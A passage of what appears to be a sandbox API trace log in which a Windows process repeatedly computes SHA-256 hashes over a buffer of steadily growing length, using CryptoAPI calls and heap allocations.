	[0214.605] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.605] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734678
	[0214.605] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734678, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734678, pdwDataLen=0x128ba4) returned 1
	[0214.605] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.605] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.605] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.606] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.606] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0214.606] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.606] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27346a0
	[0214.606] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27346a0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27346a0, pdwDataLen=0x128ba4) returned 1
	[0214.606] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.606] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.606] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.606] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.606] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0214.606] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.606] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27346c8
	[0214.606] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27346c8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27346c8, pdwDataLen=0x128ba4) returned 1
	[0214.606] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.606] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.606] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.607] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.607] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0214.607] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.607] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27346f0
	[0214.607] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27346f0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27346f0, pdwDataLen=0x128ba4) returned 1
	[0214.607] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.607] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.607] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.607] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.607] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0214.607] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.607] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734718
	[0214.607] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734718, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734718, pdwDataLen=0x128ba4) returned 1
	[0214.607] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.607] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.607] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.608] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.608] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0214.608] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.608] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734740
	[0214.608] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734740, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734740, pdwDataLen=0x128ba4) returned 1
	[0214.608] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.608] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.608] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.608] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.608] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0214.608] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.608] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734768
	[0214.608] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734768, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734768, pdwDataLen=0x128ba4) returned 1
	[0214.608] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.608] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.609] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.609] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.609] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0214.609] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.609] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734790
	[0214.609] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734790, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734790, pdwDataLen=0x128ba4) returned 1
	[0214.609] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.609] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.609] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.609] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.610] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0214.610] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.624] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27347b8
	[0214.624] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27347b8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27347b8, pdwDataLen=0x128ba4) returned 1
	[0214.625] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.625] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.625] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.625] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.625] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0214.625] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.625] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27347e0
	[0214.625] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27347e0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27347e0, pdwDataLen=0x128ba4) returned 1
	[0214.625] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.625] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.625] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.626] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.626] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0214.626] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.626] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734808
	[0214.626] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734808, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734808, pdwDataLen=0x128ba4) returned 1
	[0214.626] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.626] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.626] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.626] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.626] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0214.626] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.626] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734830
	[0214.626] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734830, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734830, pdwDataLen=0x128ba4) returned 1
	[0214.626] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.626] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.626] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.627] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.627] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0214.627] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.627] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734858
	[0214.627] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734858, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734858, pdwDataLen=0x128ba4) returned 1
	[0214.627] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.627] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.627] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.627] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.627] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0214.627] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.627] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734880
	[0214.627] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734880, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734880, pdwDataLen=0x128ba4) returned 1
	[0214.627] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.627] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.627] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.628] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.628] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0214.628] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.628] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27348a8
	[0214.628] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27348a8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27348a8, pdwDataLen=0x128ba4) returned 1
	[0214.628] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.628] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.628] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.628] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.628] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0214.628] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.628] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27348d0
	[0214.629] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27348d0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27348d0, pdwDataLen=0x128ba4) returned 1
	[0214.629] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.629] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.629] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.629] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.629] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0214.629] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.629] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27348f8
	[0214.629] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27348f8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27348f8, pdwDataLen=0x128ba4) returned 1
	[0214.629] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.629] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.629] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.630] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.630] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0214.630] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.630] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734920
	[0214.630] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734920, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734920, pdwDataLen=0x128ba4) returned 1
	[0214.630] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.630] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.630] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.630] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.630] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0214.630] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.630] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734948
	[0214.630] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734948, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734948, pdwDataLen=0x128ba4) returned 1
	[0214.630] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.630] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.630] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.631] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.631] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0214.631] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.631] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734970
	[0214.631] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734970, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734970, pdwDataLen=0x128ba4) returned 1
	[0214.631] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.631] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.631] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.631] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.631] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0214.631] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.631] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734998
	[0214.631] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734998, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734998, pdwDataLen=0x128ba4) returned 1
	[0214.631] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.631] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.631] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.632] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.632] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0214.632] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.632] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27349c0
	[0214.632] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27349c0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27349c0, pdwDataLen=0x128ba4) returned 1
	[0214.632] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.632] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.632] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.632] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.632] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0214.632] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.632] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27349e8
	[0214.632] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27349e8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27349e8, pdwDataLen=0x128ba4) returned 1
	[0214.632] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.632] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.632] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.633] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.633] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0214.633] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.633] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734a10
	[0214.633] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2734a10, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734a10, pdwDataLen=0x128ba4) returned 1
	[0214.633] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.633] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.633] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.633] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.633] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0214.633] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.633] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734a38
	[0214.633] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2734a38, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2734a38, pdwDataLen=0x128ba4) returned 1
	[0214.633] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.633] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.633] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.634] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.634] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0214.634] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.634] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2734a60
